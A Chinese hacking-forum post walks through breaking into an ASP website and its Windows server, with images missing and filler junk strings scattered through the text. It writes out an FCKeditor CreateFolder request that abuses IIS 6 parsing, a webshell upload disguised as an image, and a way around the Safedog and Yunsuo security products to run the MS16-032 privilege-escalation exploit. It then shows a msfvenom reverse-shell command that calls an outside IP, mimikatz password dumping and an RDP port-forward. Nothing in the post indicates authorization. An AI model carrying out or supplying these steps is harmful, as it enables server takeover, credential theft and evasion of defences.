找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 从getwebshell到绕过安全狗云锁提权再到利用matasploit ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2142|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

3 i1 T' [" M' K/ j: d8 M

8 F) V, k* ?$ L j: A3 H9 c' W; p% n: b" [# r0 W/ O$ x+ f2 q2 S) B4 r& s8 F, N& j; [" x$ {6 Z. d* S1 T* k6 m- ?) n% `6 ~% L j% i4 H* a' m4 p1 p2 ^) b# G4 P
$ s9 e& I: l7 W; A

: j) ?2 z' D) _: W
+ V; O5 Y- m8 W3 E# M4 h2 R 一、 利用getwebshell
0 {; l: z7 S7 C' J
8 b5 L9 G! z1 H首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
, W( Q* q& Q4 _5 ?& O# [. z
0 a: ]* Y9 a, U/ n: U C222.png
# h5 I5 Z$ G3 T8 ~* G( I |4 S$ N下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
5 i% o% h8 Z4 Q" c' v" q: ?, X 333.png
7 y9 Y! o, ~5 }) M: F6 ^; J! F下面我们构造一个asp目录,如: : Q/ q& |% d* ?4 u* {6 v

5 G, x5 W) M9 M- D( ]) G5 ?

* z, Q7 }5 v* E6 N4 J http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 ; O$ o7 T. J" W

1 _! l/ m8 [) K! k2 F/ g

4 m& ?0 `- a" G) J2 L) W 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
4 D9 |) I" B& N1 l" x
, T6 ~" N% u) W5 Z" y, H9 W2 R一、 绕过安全狗云锁提权并且加账号
9 r, k7 r9 [$ R- E3 ` 444.png
9 m3 W# ^# S5 V5 c0 X% [7 J/ k没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
8 l; V# A, O7 P3 V' A. m& \
* z% E) E; R8 r2 t5 {3 L 如图:
& L R7 J2 H9 |! A# A8 I' N 555.png
0 C0 ]9 D; w( s- S$ V- h0 N 然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
* _* s. I2 R9 _4 x* k9 w! A
e9 |/ q9 i8 ]9 r# V 一、 利用metasploit
1 }6 l9 i6 d) E, I
7 w) R' e3 [/ Z: o2 \$ L$ c- o* S 首先用pentestbox生成一个64位的payload如下命令
( J6 I0 c3 X; T
" L6 a0 m# w+ }7 ?- S. o msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
/ x9 A, z, Z3 c, |* j" C) G- z% l. @
A# y6 [, J1 O* Q, ?; P为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
1 p6 t( f) k6 t" `8 O 11.png
0 n4 a/ [( c+ L7 X* p4 { 下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
4 K; C# [; A( C0 [5 ]- ~1 C: a4 |$ @13.png
2 g2 Z* D1 b2 n下面我们来做一个监听如下命令:
" c" a6 w9 ~9 A, |. u- M
* X8 I( z2 p3 ~6 J D2 X: t) K/ J0 L3 G; oportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
- B A3 \: u# c5 J2 G18.png . T' I% l4 i" G' a

7 z0 u4 B: l/ X* k
# q6 v7 d8 z0 x1 J( Q& @' q5 O" ~

2 z' c' X5 E* W0 V

! T; ~: r2 Q' N3 M3 `1 m$ t
# c9 S3 \( ~7 ^8 M9 `: _$ M
0 H* |) A3 n) S# S. O* Y2 Q # E2 Q2 j) x7 z5 H

3 Z' N% Z+ e9 o% ~7 ~
9 R$ a3 a" y* e& G$ q' P# y% o* z0 G( N ! \- A; c! F6 h

9 ]* q" ^$ N% X% c. W
: F: ?( O/ P) W" {' b. o$ d9 Y6 _

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表